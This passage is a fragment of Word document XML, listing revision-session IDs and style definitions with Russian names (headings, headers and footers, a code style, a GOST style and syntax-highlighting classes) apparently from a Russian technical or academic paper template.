    <w:rsid w:val="006F4B13"/>
    <w:rsid w:val="006F5353"/>
    <w:rsid w:val="00705CE0"/>
    <w:rsid w:val="00715B00"/>
    <w:rsid w:val="00720175"/>
    <w:rsid w:val="0072067A"/>
    <w:rsid w:val="00722F3A"/>
    <w:rsid w:val="00726813"/>
    <w:rsid w:val="00731275"/>
    <w:rsid w:val="00733FA5"/>
    <w:rsid w:val="00737ACE"/>
    <w:rsid w:val="007408F1"/>
    <w:rsid w:val="007429B9"/>
    <w:rsid w:val="00751E25"/>
    <w:rsid w:val="007737BE"/>
    <w:rsid w:val="00774305"/>
    <w:rsid w:val="00776CB4"/>
    <w:rsid w:val="0078289B"/>
    <w:rsid w:val="007876D1"/>
    <w:rsid w:val="007916D0"/>
    <w:rsid w:val="0079271A"/>
    <w:rsid w:val="007B2764"/>
    <w:rsid w:val="007B3DB0"/>
    <w:rsid w:val="007B6474"/>
    <w:rsid w:val="007B68E2"/>
    <w:rsid w:val="007C0575"/>
    <w:rsid w:val="007C147F"/>
    <w:rsid w:val="007C3655"/>
    <w:rsid w:val="007C3BE6"/>
    <w:rsid w:val="007C3C24"/>
    <w:rsid w:val="007C4EE0"/>
    <w:rsid w:val="007C6CC7"/>
    <w:rsid w:val="007C731A"/>
    <w:rsid w:val="007D3C71"/>
    <w:rsid w:val="007E512A"/>
    <w:rsid w:val="007E6942"/>
    <w:rsid w:val="007F1B9D"/>
    <w:rsid w:val="007F6324"/>
    <w:rsid w:val="007F7D25"/>
    <w:rsid w:val="008039E2"/>
    <w:rsid w:val="00810CD9"/>
    <w:rsid w:val="00814AF1"/>
    <w:rsid w:val="00816F1B"/>
    <w:rsid w:val="00817BDB"/>
    <w:rsid w:val="00823137"/>
    <w:rsid w:val="00832A95"/>
    <w:rsid w:val="00832C8B"/>
    <w:rsid w:val="008353F2"/>
    <w:rsid w:val="00837F65"/>
    <w:rsid w:val="008468C9"/>
    <w:rsid w:val="0085374A"/>
    <w:rsid w:val="0085406E"/>
    <w:rsid w:val="00855782"/>
    <w:rsid w:val="00857644"/>
    <w:rsid w:val="00870A0C"/>
    <w:rsid w:val="008778F0"/>
    <w:rsid w:val="00877909"/>
    <w:rsid w:val="008807B6"/>
    <w:rsid w:val="008809B0"/>
    <w:rsid w:val="008853DD"/>
    <w:rsid w:val="008870EE"/>
    <w:rsid w:val="00892905"/>
    <w:rsid w:val="00894CEA"/>
    <w:rsid w:val="008A25D3"/>
    <w:rsid w:val="008B1D74"/>
    <w:rsid w:val="008B52A5"/>
    <w:rsid w:val="008C1A5F"/>
    <w:rsid w:val="008C24C6"/>
    <w:rsid w:val="008D61B3"/>
    <w:rsid w:val="008D656C"/>
    <w:rsid w:val="008E24A9"/>
    <w:rsid w:val="008E2E18"/>
    <w:rsid w:val="008E4276"/>
    <w:rsid w:val="008E6783"/>
    <w:rsid w:val="008F05DC"/>
    <w:rsid w:val="008F14CF"/>
    <w:rsid w:val="008F392E"/>
    <w:rsid w:val="008F53E6"/>
    <w:rsid w:val="009038B0"/>
    <w:rsid w:val="0091294E"/>
    <w:rsid w:val="00916BD7"/>
    <w:rsid w:val="009245A3"/>
    <w:rsid w:val="009271BC"/>
    <w:rsid w:val="00931168"/>
    <w:rsid w:val="00932A9A"/>
    <w:rsid w:val="0093378B"/>
    <w:rsid w:val="00941E12"/>
    <w:rsid w:val="009473D1"/>
    <w:rsid w:val="00960CFE"/>
    <w:rsid w:val="00961019"/>
    <w:rsid w:val="00961BC0"/>
    <w:rsid w:val="00970D66"/>
    <w:rsid w:val="00972783"/>
    <w:rsid w:val="00973F36"/>
    <w:rsid w:val="00974A86"/>
    <w:rsid w:val="00992CC1"/>
    <w:rsid w:val="0099607C"/>
    <w:rsid w:val="00997623"/>
    <w:rsid w:val="009A01F8"/>
    <w:rsid w:val="009A20F6"/>
    <w:rsid w:val="009A4E82"/>
    <w:rsid w:val="009A7866"/>
    <w:rsid w:val="009B57CE"/>
    <w:rsid w:val="009C257F"/>
    <w:rsid w:val="009C53F7"/>
    <w:rsid w:val="009C56D5"/>
    <w:rsid w:val="009C5FC5"/>
    <w:rsid w:val="009D138A"/>
    <w:rsid w:val="009D292C"/>
    <w:rsid w:val="009D3F05"/>
    <w:rsid w:val="009D46C1"/>
    <w:rsid w:val="009D7995"/>
    <w:rsid w:val="009E698C"/>
    <w:rsid w:val="009F0403"/>
    <w:rsid w:val="009F20C0"/>
    <w:rsid w:val="009F2EDD"/>
    <w:rsid w:val="009F323D"/>
    <w:rsid w:val="009F603A"/>
    <w:rsid w:val="00A02A90"/>
    <w:rsid w:val="00A04D10"/>
    <w:rsid w:val="00A0551F"/>
    <w:rsid w:val="00A069BF"/>
    <w:rsid w:val="00A07C19"/>
    <w:rsid w:val="00A10AC9"/>
    <w:rsid w:val="00A10E4D"/>
    <w:rsid w:val="00A13927"/>
    <w:rsid w:val="00A15631"/>
    <w:rsid w:val="00A22213"/>
    <w:rsid w:val="00A22EF7"/>
    <w:rsid w:val="00A30F22"/>
    <w:rsid w:val="00A31E61"/>
    <w:rsid w:val="00A31F97"/>
    <w:rsid w:val="00A33DA1"/>
    <w:rsid w:val="00A35969"/>
    <w:rsid w:val="00A365F8"/>
    <w:rsid w:val="00A376C2"/>
    <w:rsid w:val="00A414E9"/>
    <w:rsid w:val="00A42AB9"/>
    <w:rsid w:val="00A43272"/>
    <w:rsid w:val="00A511E9"/>
    <w:rsid w:val="00A5329B"/>
    <w:rsid w:val="00A54652"/>
    <w:rsid w:val="00A54FE4"/>
    <w:rsid w:val="00A663BC"/>
    <w:rsid w:val="00A66BB1"/>
    <w:rsid w:val="00A67502"/>
    <w:rsid w:val="00A76471"/>
    <w:rsid w:val="00A82002"/>
    <w:rsid w:val="00A833AB"/>
    <w:rsid w:val="00A84917"/>
    <w:rsid w:val="00A86ECB"/>
    <w:rsid w:val="00A91EEC"/>
    <w:rsid w:val="00A968B2"/>
    <w:rsid w:val="00A96FE7"/>
    <w:rsid w:val="00AA0AC4"/>
    <w:rsid w:val="00AA37E4"/>
    <w:rsid w:val="00AA5706"/>
    <w:rsid w:val="00AA5B9E"/>
    <w:rsid w:val="00AA6889"/>
    <w:rsid w:val="00AB0FB5"/>
    <w:rsid w:val="00AB27CC"/>
    <w:rsid w:val="00AB3E12"/>
    <w:rsid w:val="00AB6B30"/>
    <w:rsid w:val="00AC25AD"/>
    <w:rsid w:val="00AD0094"/>
    <w:rsid w:val="00AD1A6A"/>
    <w:rsid w:val="00AE0E1C"/>
    <w:rsid w:val="00AE10F8"/>
    <w:rsid w:val="00AE25A7"/>
    <w:rsid w:val="00AE461B"/>
    <w:rsid w:val="00AE4E91"/>
    <w:rsid w:val="00AF3225"/>
    <w:rsid w:val="00AF7BAC"/>
    <w:rsid w:val="00B013D2"/>
    <w:rsid w:val="00B03915"/>
    <w:rsid w:val="00B03DF0"/>
    <w:rsid w:val="00B10A09"/>
    <w:rsid w:val="00B14363"/>
    <w:rsid w:val="00B154B5"/>
    <w:rsid w:val="00B16514"/>
    <w:rsid w:val="00B27EDD"/>
    <w:rsid w:val="00B33C44"/>
    <w:rsid w:val="00B43391"/>
    <w:rsid w:val="00B45074"/>
    <w:rsid w:val="00B53024"/>
    <w:rsid w:val="00B5426C"/>
    <w:rsid w:val="00B549DB"/>
    <w:rsid w:val="00B60B70"/>
    <w:rsid w:val="00B61F64"/>
    <w:rsid w:val="00B7559F"/>
    <w:rsid w:val="00B75C22"/>
    <w:rsid w:val="00B76676"/>
    <w:rsid w:val="00B85DCD"/>
    <w:rsid w:val="00B92BC2"/>
    <w:rsid w:val="00B93EC6"/>
    <w:rsid w:val="00B959B5"/>
    <w:rsid w:val="00BA1029"/>
    <w:rsid w:val="00BA39DA"/>
    <w:rsid w:val="00BB3B56"/>
    <w:rsid w:val="00BB3FF5"/>
    <w:rsid w:val="00BB4D87"/>
    <w:rsid w:val="00BC1309"/>
    <w:rsid w:val="00BC1FD1"/>
    <w:rsid w:val="00BC53F5"/>
    <w:rsid w:val="00BC6DA5"/>
    <w:rsid w:val="00BC7862"/>
    <w:rsid w:val="00BD0CF5"/>
    <w:rsid w:val="00BD34A5"/>
    <w:rsid w:val="00BD3B49"/>
    <w:rsid w:val="00BD46D9"/>
    <w:rsid w:val="00BD5112"/>
    <w:rsid w:val="00BD5C4C"/>
    <w:rsid w:val="00BD63ED"/>
    <w:rsid w:val="00BE2C8A"/>
    <w:rsid w:val="00BE6243"/>
    <w:rsid w:val="00BF1801"/>
    <w:rsid w:val="00BF50CB"/>
    <w:rsid w:val="00BF681E"/>
    <w:rsid w:val="00C05AA9"/>
    <w:rsid w:val="00C133D2"/>
    <w:rsid w:val="00C265A7"/>
    <w:rsid w:val="00C31B3C"/>
    <w:rsid w:val="00C340E6"/>
    <w:rsid w:val="00C341CD"/>
    <w:rsid w:val="00C368DE"/>
    <w:rsid w:val="00C448E6"/>
    <w:rsid w:val="00C454F4"/>
    <w:rsid w:val="00C45690"/>
    <w:rsid w:val="00C471B3"/>
    <w:rsid w:val="00C4792E"/>
    <w:rsid w:val="00C56C37"/>
    <w:rsid w:val="00C60DF4"/>
    <w:rsid w:val="00C625A2"/>
    <w:rsid w:val="00C62EC9"/>
    <w:rsid w:val="00C63496"/>
    <w:rsid w:val="00C64174"/>
    <w:rsid w:val="00C67F95"/>
    <w:rsid w:val="00C73BD1"/>
    <w:rsid w:val="00C7496F"/>
    <w:rsid w:val="00C76953"/>
    <w:rsid w:val="00C7756E"/>
    <w:rsid w:val="00C8220D"/>
    <w:rsid w:val="00C82EAA"/>
    <w:rsid w:val="00C83B5B"/>
    <w:rsid w:val="00C91295"/>
    <w:rsid w:val="00C970B8"/>
    <w:rsid w:val="00C97DD1"/>
    <w:rsid w:val="00CA10CA"/>
    <w:rsid w:val="00CA25FD"/>
    <w:rsid w:val="00CB23DC"/>
    <w:rsid w:val="00CB408B"/>
    <w:rsid w:val="00CB576D"/>
    <w:rsid w:val="00CB5BA4"/>
    <w:rsid w:val="00CC2EBA"/>
    <w:rsid w:val="00CC3C0A"/>
    <w:rsid w:val="00CC514B"/>
    <w:rsid w:val="00CC7695"/>
    <w:rsid w:val="00CD5709"/>
    <w:rsid w:val="00CD5DAA"/>
    <w:rsid w:val="00CF3045"/>
    <w:rsid w:val="00CF5577"/>
    <w:rsid w:val="00CF6620"/>
    <w:rsid w:val="00D06CCC"/>
    <w:rsid w:val="00D1599B"/>
    <w:rsid w:val="00D16020"/>
    <w:rsid w:val="00D25175"/>
    <w:rsid w:val="00D31CF7"/>
    <w:rsid w:val="00D51198"/>
    <w:rsid w:val="00D623CA"/>
    <w:rsid w:val="00D650FE"/>
    <w:rsid w:val="00D74C46"/>
    <w:rsid w:val="00D76239"/>
    <w:rsid w:val="00D7766A"/>
    <w:rsid w:val="00D8056C"/>
    <w:rsid w:val="00D82ACC"/>
    <w:rsid w:val="00D91B15"/>
    <w:rsid w:val="00D94CD7"/>
    <w:rsid w:val="00DA0F40"/>
    <w:rsid w:val="00DA27E9"/>
    <w:rsid w:val="00DA4546"/>
    <w:rsid w:val="00DA58C3"/>
    <w:rsid w:val="00DA66E1"/>
    <w:rsid w:val="00DB02FB"/>
    <w:rsid w:val="00DB25E6"/>
    <w:rsid w:val="00DB590E"/>
    <w:rsid w:val="00DB7354"/>
    <w:rsid w:val="00DC3385"/>
    <w:rsid w:val="00DC436B"/>
    <w:rsid w:val="00DC61AA"/>
    <w:rsid w:val="00DC68C3"/>
    <w:rsid w:val="00DD3D64"/>
    <w:rsid w:val="00DD75A0"/>
    <w:rsid w:val="00DE0AFA"/>
    <w:rsid w:val="00DE1815"/>
    <w:rsid w:val="00DE1920"/>
    <w:rsid w:val="00DE2A22"/>
    <w:rsid w:val="00DE3071"/>
    <w:rsid w:val="00DE3513"/>
    <w:rsid w:val="00DE5EE6"/>
    <w:rsid w:val="00DF2D19"/>
    <w:rsid w:val="00DF68A6"/>
    <w:rsid w:val="00DF6935"/>
    <w:rsid w:val="00E03BAC"/>
    <w:rsid w:val="00E258B2"/>
    <w:rsid w:val="00E301E6"/>
    <w:rsid w:val="00E325B2"/>
    <w:rsid w:val="00E364BF"/>
    <w:rsid w:val="00E41616"/>
    <w:rsid w:val="00E41FFA"/>
    <w:rsid w:val="00E43F36"/>
    <w:rsid w:val="00E473ED"/>
    <w:rsid w:val="00E550AA"/>
    <w:rsid w:val="00E5530C"/>
    <w:rsid w:val="00E577AD"/>
    <w:rsid w:val="00E645DF"/>
    <w:rsid w:val="00E64D3C"/>
    <w:rsid w:val="00E65C69"/>
    <w:rsid w:val="00E662A4"/>
    <w:rsid w:val="00E67720"/>
    <w:rsid w:val="00E73321"/>
    <w:rsid w:val="00E739D2"/>
    <w:rsid w:val="00E74F07"/>
    <w:rsid w:val="00E8167C"/>
    <w:rsid w:val="00EA2FFD"/>
    <w:rsid w:val="00EA376F"/>
    <w:rsid w:val="00EB2F89"/>
    <w:rsid w:val="00EB37C5"/>
    <w:rsid w:val="00EB413D"/>
    <w:rsid w:val="00EB6628"/>
    <w:rsid w:val="00EC10A8"/>
    <w:rsid w:val="00EC494F"/>
    <w:rsid w:val="00EC5625"/>
    <w:rsid w:val="00ED1D25"/>
    <w:rsid w:val="00ED302D"/>
    <w:rsid w:val="00ED3F24"/>
    <w:rsid w:val="00EF3376"/>
    <w:rsid w:val="00EF36ED"/>
    <w:rsid w:val="00EF7643"/>
    <w:rsid w:val="00F17274"/>
    <w:rsid w:val="00F22810"/>
    <w:rsid w:val="00F23F34"/>
    <w:rsid w:val="00F24846"/>
    <w:rsid w:val="00F25F0B"/>
    <w:rsid w:val="00F30DCC"/>
    <w:rsid w:val="00F3404C"/>
    <w:rsid w:val="00F43E9B"/>
    <w:rsid w:val="00F46F4B"/>
    <w:rsid w:val="00F47B32"/>
    <w:rsid w:val="00F52EF0"/>
    <w:rsid w:val="00F54C66"/>
    <w:rsid w:val="00F564B1"/>
    <w:rsid w:val="00F56E07"/>
    <w:rsid w:val="00F61E3D"/>
    <w:rsid w:val="00F62EDE"/>
    <w:rsid w:val="00F62F92"/>
    <w:rsid w:val="00F639A5"/>
    <w:rsid w:val="00F659E4"/>
    <w:rsid w:val="00F66E63"/>
    <w:rsid w:val="00F70CD0"/>
    <w:rsid w:val="00F71AE0"/>
    <w:rsid w:val="00F71FE3"/>
    <w:rsid w:val="00F77EC0"/>
    <w:rsid w:val="00F90EA7"/>
    <w:rsid w:val="00F93289"/>
    <w:rsid w:val="00FB317B"/>
    <w:rsid w:val="00FB32F4"/>
    <w:rsid w:val="00FB4964"/>
    <w:rsid w:val="00FB6623"/>
    <w:rsid w:val="00FC1203"/>
    <w:rsid w:val="00FC4163"/>
    <w:rsid w:val="00FC6F20"/>
    <w:rsid w:val="00FF6C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14:docId w14:val="4E2D556E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{833A373B-0254-449E-98D1-2ED57F1C97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uiPriority="39"/>
    <w:lsdException w:name="toc 2" w:locked="1" w:uiPriority="39"/>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Hyperlink" w:uiPriority="99"/>
    <w:lsdException w:name="Strong" w:locked="1" w:qFormat="1"/>
    <w:lsdException w:name="Emphasis" w:locked="1" w:qFormat="1"/>
    <w:lsdException w:name="HTML Code" w:uiPriority="99"/>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F36ED"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A04D10"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00A04D10"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:b/>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aliases w:val="common text"/>
    <w:rsid w:val="00A04D10"/>
    <w:pPr>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:locked/>
    <w:rsid w:val="00A04D10"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:locked/>
    <w:rsid w:val="00A04D10"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="Абзац списка1"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00402520"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a4"/>
    <w:rsid w:val="00505306"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:locked/>
    <w:rsid w:val="00505306"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:rsid w:val="00505306"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:locked/>
    <w:rsid w:val="00505306"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a7">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00087DE3"/>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rsid w:val="00682EF1"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a9">
    <w:name w:val="Код"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:rsid w:val="005B41D0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="708" w:hanging="708"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="Код Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:locked/>
    <w:rsid w:val="005B41D0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="13">
    <w:name w:val="Заголовок оглавления1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:rsid w:val="001C0E55"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:color w:val="2E74B5"/>
      <w:sz w:val="32"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003B0BDC"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="709" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002F67A2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:left="709" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ab">
    <w:name w:val="Заг. Без оглавления"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:rsid w:val="00892905"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Заг. Без оглавления Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:locked/>
    <w:rsid w:val="00892905"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ad">
    <w:name w:val="ГОСТ"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ae"/>
    <w:rsid w:val="00646613"/>
    <w:rPr>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="ГОСТ Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ad"/>
    <w:locked/>
    <w:rsid w:val="00646613"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:semiHidden/>
    <w:rsid w:val="004D79A4"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="954F72"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="Замещающий текст1"/>
    <w:basedOn w:val="a0"/>
    <w:semiHidden/>
    <w:rsid w:val="00B013D2"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="Неразрешенное упоминание1"/>
    <w:basedOn w:val="a0"/>
    <w:semiHidden/>
    <w:rsid w:val="00F93289"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af0">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:semiHidden/>
    <w:rsid w:val="00107CA1"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:semiHidden/>
    <w:rsid w:val="00107CA1"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af1"/>
    <w:next w:val="af1"/>
    <w:semiHidden/>
    <w:rsid w:val="00107CA1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:semiHidden/>
    <w:rsid w:val="00107CA1"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af4">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A43272"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0042767C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0042767C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0042767C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0042767C"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C09BA"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C09BA"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C09BA"/>
  </w:style>
  <w:style w:type="character" w:styleId="af5">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C09BA"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C09BA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E677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lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML1">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E67720"/>
    <w:rPr>
